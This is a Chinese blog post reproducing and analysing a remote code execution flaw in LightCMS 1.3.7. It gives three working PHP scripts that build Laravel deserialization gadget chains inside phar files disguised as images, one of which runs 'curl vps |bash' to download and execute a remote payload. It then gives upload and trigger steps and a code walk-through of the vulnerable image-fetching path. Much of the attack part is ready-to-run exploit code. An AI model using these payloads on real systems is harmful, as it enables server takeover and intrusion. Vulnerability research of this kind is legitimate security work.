LightCMS1.3.7-RCE漏洞

最新推荐文章于 2023-12-17 14:55:48 发布
最新推荐文章于 2023-12-17 14:55:48 发布
阅读量375 收藏 4
点赞数 6
分类专栏: 代码审计 文章标签: LightCMS php 代码审计 新星计划
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/117770311
版权

LightCMS1.3.7-RCE漏洞

环境搭建(Kali)

参考之间的文章:LightCMS1.3.5-任意文件读取&RCE漏洞

漏洞复现

找一个 Laravel RCE 的 gadget,生成 phar 文件,exp如下

POP_1

<?php

namespace Illuminate\Broadcasting{
    class PendingBroadcast
    {
        protected $events;
        protected $event;

        public function __construct($events, $event)
        {
            $this->events = $events;
            $this->event = $event;
        }

    }

    class BroadcastEvent
    {
        protected $connection;

        public function __construct($connection)
        {
            $this->connection = $connection;
        }
    }

}

namespace Illuminate\Bus{
    class Dispatcher{
        protected $queueResolver;

        public function __construct($queueResolver)
        {
            $this->queueResolver = $queueResolver;
        }

    }
}

namespace{
    $command = new Illuminate\Broadcasting\BroadcastEvent('whoami');

    $dispater = new Illuminate\Bus\Dispatcher("system");

    $PendingBroadcast = new Illuminate\Broadcasting\PendingBroadcast($dispater,$command);
    $phar = new Phar('phar.phar');
    $phar -> stopBuffering();
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
    $phar -> addFromString('test.txt','test');
    $phar -> setMetadata($PendingBroadcast);
    $phar -> stopBuffering();
    rename('phar.phar','phar.jpg');
}

POP_2

<?php
namespace Illuminate\Broadcasting
{
    use  Illuminate\Events\Dispatcher;
    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct($cmd)
        {
            $this->events = new Dispatcher($cmd);
            $this->event=$cmd;
        }
    }

}


namespace Illuminate\Events
{
    class Dispatcher
    {
       protected $listeners;
       public function __construct($event){
           $this->listeners=[$event=>['system']];
       }
    }
}
namespace{
    $phar = new Phar('phar.phar');
    $phar -> startBuffering();
    $phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
    $o = new Illuminate\Broadcasting\PendingBroadcast($argv[1]);
    echo base64_encode(serialize($o));
    $phar -> setMetadata($o);
    $phar -> addFromString('test.txt','test');
$phar -> stopBuffering();
}

POP_3

<?php

namespace Illuminate\Broadcasting{
    class PendingBroadcast
    {
        protected $events;
        protected $event;

        public function __construct($events, $event)
        {
            $this->events = $events;
            $this->event = $event;
        }

    }

    class BroadcastEvent
    {
      protected $connection;

      public function __construct($connection)
      {
        $this->connection = $connection;
      }
    }

}

namespace Illuminate\Bus{
    class Dispatcher{
        protected $queueResolver;

        public function __construct($queueResolver)
        {
          $this->queueResolver = $queueResolver;
        }

    }
}

namespace{
    $command = new Illuminate\Broadcasting\BroadcastEvent('curl vps |bash');

    $dispater = new Illuminate\Bus\Dispatcher("system");

    $PendingBroadcast = new Illuminate\Broadcasting\PendingBroadcast($dispater,$command);
    $phar = new Phar('phar.phar');
    $phar -> stopBuffering();
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); 
    $phar -> addFromString('test.txt','test');
    $phar -> setMetadata($PendingBroadcast);
    $phar -> stopBuffering();
    rename('phar.phar','phar.jpg');

}

来到内容管理 - 新增文章内容,上传文件,就会得到一个这样的图片 url:http://127.0.0.1:8000/upload/image/202106/qYUkjTWuFUMdMKo2hhp4DptwF23FkZJZ2nM1ixWy.gif

然后来到我们自己的 vps,新建一个 txt,内容为:phar://./upload/image/202106/qYUkjTWuFUMdMKo2hhp4DptwF23FkZJZ2nM1ixWy.gif

然后 POST 提交到这个路由即可触发 phar 反序列化

漏洞分析

在LightCMS1.3.5的任意文件读取漏洞被提出并且修复后,我们来分析一下作者修复所用的fetchImageFile函数

在这里插入图片描述

跟进fetchImageFile函数,可以看到其使用curl来获取远程资源的内容,然后使用 Image:make 模块进行解析,并且对后缀也进行了严格的过滤,由于该后台是基于laravel框架开发,并且这个cms 后台还是有图片上传功能的,不妨我们尝试利用phar反序列化实现RCE

在这里插入图片描述

我们跟进一下isWebp函数 ,由于传入的不是Webp文件,所以会进入Image::make($data);,而且这个data变量也就是请求返回的内容,在获取到远程url的内容后,会调用Intervention\Image\Facades\Image的 make方法,对图片内容进行解析

在这里插入图片描述

继续跟进到vendor/intervention/image/src/intervention/Image/AbstractDriver.php,通过 init(),然后传入 decoder->init()

在这里插入图片描述
在这里插入图片描述

可以看到 data 不仅可以是图片的二进制数据 ,还可以是这些数据格式,跟进 initFromUrl方法

在这里插入图片描述

它继续读取了这个 url 的内容,然后作为 binary 数据处理

在这里插入图片描述

跟进 isUrl,这个方法只是利用 FILTER VAR 判断是否为 url,这意味着前面的 http 协议可以替换成其他协议,比如 phar 协议,将 url 内容改成一个 phar 进行测试,依旧进到了这里并且传给了 file_get_contents(),即可以触发 phar 反序列化

在这里插入图片描述

H3rmesk1t
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
专栏目录
LightCMS全版本后台RCE 0day分析1
08-03
这个 0day 是个 Phar 反序列化打 Laravel RCE 的洞,因此需要能够将 phar 件上传,在后台的内容管理中不难发现图像上传位点查看其 HTM
5、lxmcms1.40代码审计
最新发布
Yzz_的博客
03-04 450
同样跟踪到query会有报错语句回显。
漏洞复现-milesight vpn 任意文件读取漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-17 462
漏洞复现-milesight vpn 任意文件读取漏洞,附带自己写的poc脚本
赞助商:LightCMS
CSS 初学者指南
07-09 106
LightCMS是市场上唯一真正的白标内容管理系统。 如果您曾经在使用其他人的系统时考虑过将自己的Web设计业务品牌化,那么您需要查看其开发人员计划 。 您将唾手可得所有增强的转销商工具,以及对网站HTML和CSS的完全访问权限。 他们甚至为您提供免费的企业网站。 如果您正在考虑更换CMS供应商,甚至想扩展当前的业务模式,请通过开始免费的14天试用来迈出第一步。 无需信用卡。 直接连...
php mysql后台管理系统通用框架,lightCMS: lightCMS是一个轻量级的CMS系统,也可以作为一个通用的后台管理框架使用。...
weixin_31349647的博客
03-27 281
LightCMS 项目简介lightCMS是一个轻量级的CMS系统,也可以作为一个通用的后台管理框架使用。lightCMS集成了用户管理、权限管理、日志管理、菜单管理等后台管理框架的通用功能,同时也提供模型管理、分类管理等CMS系统中常用的功能。lightCMS的代码一键生成功能可以快速对特定模型生成增删改查代码,极大提高开发效率。lightCMS基于Laravel 5.5开发,前端框架基于...
LightCMS-PHP
06-20
lightCMS是一个轻量级的CMS系统,也可以作为一个通用的后台管理框架使用。lightCMS集成了用户管理、权限管理、日志管理、菜单管理等后台管理框架的通用功能,同时也提供模型管理、分类管理等CMS系统中常用的功能。...
lightCMS系统源码-基于Laravel 5.5开发前端框架基于layui.zip
07-01
lightCMS是一个轻量级的CMS系统,也可以作为一个通用的后台管理框架使用。lightCMS集成了用户管理、权限管理、日志管理、菜单管理等后台管理框架的通用功能,同时也提供模型管理、分类管理等CMS系统中常用的功能。...
LightCMS 轻量级cms系统
08-14
lightCMS是一个轻量级的CMS系统,也可以作为一个通用的后台管理框架使用。lightCMS集成了用户管理、权限管理、日志管理、菜单管理等后台管理框架的通用功能,同时也提供模型管理、分类管理等CMS系统中常用的功能。...
LightCMS源代码
03-15
lightCMS是一个轻量级的CMS系统,也可以作为一个通用的后台管理框架使用。lightCMS集成了用户管理、权限管理、日志管理、菜单管理等后台管理框架的通用功能,同时也提供模型管理、分类管理等CMS系统中常用的功能。...
[PHP代码审计]LightCMS1.3.7存在命令执行漏洞
Y4tacker的博客
06-07 823
文章目录写在前面利用姿势分析 写在前面 之前就想复现来着了,后来给我忘了,今晚补上吧 利用姿势 首先用phpggc生成一个phar,当然嫌弃懒的话可以用这个 <?php namespace Illuminate\Broadcasting{ class PendingBroadcast { protected $events; protected $event; public function __construct($events,
LightCMSLightCMS是一个基于Laravel开发的轻量级CMS系统,也可以作为一个通用的后台管理框架使用
02-03
LightCMS 项目简介 lightCMS是一个轻量级的CMS系统,也可以作为一个通用的后台管理框架使用。 lightCMS集成了用户管理,权限管理,日志管理,菜单管理等后台管理框架的通用功能,同时也提供模型管理,分类管理等CMS系统中常用的功能。 lightCMS的代码一键生成功能可以快速对特定模型生成增删改查代码,极大提高开发效率。 lightCMS基于Laravel 6.x开发,基于前端框架layui 。 演示站点: 。登录信息:admin / admin。不要存储/删除重要数据,数据库会定时重置。 LightCMS&Laravel学习交流QQ群: 972796921 版本库分区说明: 分支名称 Laravel版本 备注 主 6.x 建议使用 8.x 8.x 7.x 7.x 5.5 5.5 功能点一览 后台: 基于RBAC的权限管理 管理员,日志,菜单管理 分类管理 标签管理 配置管理 模型,模型基线,模型内容管理(后台可自定义业务模型,方便垂直行业快速开发) 会员管理 评论管理 基于Tire算法的敏感词过滤系统 普通模型增删改查代码一键生成 前台: 用户注册登
LightCMS1.3.5-任意文件读取&RCE漏洞
LYJ20010728的博客
06-09 1528
LightCMS1.3.5-任意文件读取&RCE漏洞环境搭建(Kali) 环境搭建(Kali) 个人环境配置:php7.4.15 + mysql8.0.25 首先确保系统已安装好composer,可以参考我之前写的文章:文章链接 下载文件源码 cd /var/www/html git clone https://hub.fastgit.org/eddy8/LightCMS.git cd lightCMS composer install 设置目录权限:storage/和bootst
关于LSCMS(链接工作室内容管理系统)开发的几点感想
Link_ZZ技术专栏
09-07 1190
经过几天的努力,LSCMS(链接工作室内容管理系统)的整个框架已经搭建起来了,虽然费了一番周折,但是最后还是成功了,这让我感到很欣慰,这种经过努力问题得到解决的这种感觉,是我一直寻找的,也是这种感觉一直在激励着我,
基于Laravel的轻量级CMS系统及通用管理后台
sjh717142的博客
04-11 1865
项目简介 lightCMS是一个轻量级的CMS系统,也可以作为一个通用的后台管理框架使用。lightCMS集成了用户管理、权限管理、日志管理、菜单管理等后台管理框架的通用功能,同时也提供模型管理、分类管理等CMS系统中常用的功能。lightCMS的代码一键生成功能可以快速对特定模型生成增删改查代码,极大提高开发效率。 lightCMS基于Laravel 5.5开发,前端框架基于layui。 功能点...
java 远程执行linux命令_Pikachu-RCE远程命令执行漏洞
weixin_39597323的博客
11-19 337
RCE:远程代码、命令执行漏洞给攻击者向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如...
74CMSRCE挖掘思路
include_voidmain的博客
04-06 2723
0x01 前言 在漏洞挖掘时发现了一个RCE漏洞,这个漏洞的发掘,利用过程比较有趣,和大家分享一下~ 实际上在半个月前,本人发布了一篇关于DedeCMS前端RCE分析并扩展RCE挖掘思路的文章。这篇文章中DedeCMS这个前端RCE出现的问题在于,浏览器发送至服务器数据包中的referer并没有进行过滤,并且将referer中的内容写入cache,然后include包含至当前文件,造成了代码注入,实现了RCE。在这里,执行并没有用eval,shell_exec,exec之类的危险函数,而是在于include
蝉知企业门户系统v7.7 - 命令执行漏洞
LYJ20010728的博客
08-30 2012
蝉知企业门户系统v7.7 - 命令执行漏洞环境搭建漏洞复现漏洞分析 环境搭建 源码下载地址 解压后将文件放在 web 目录下即可访问 漏洞复现 首先登录后台,找到模板编辑的地方(设计 -> 高级)插入恶意代码,但保存文件时显示需要存在指定文件时才能进行模板修改 找到设置,选择微信设置,在这里添加一个公众号,原始ID填写的内容为需要创建文件的路径加上一个 /0,即类似于 ../../../system/tmp/bmet.txt/0 这里需要先创建⼀个正常的接⼝,然后再重新
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值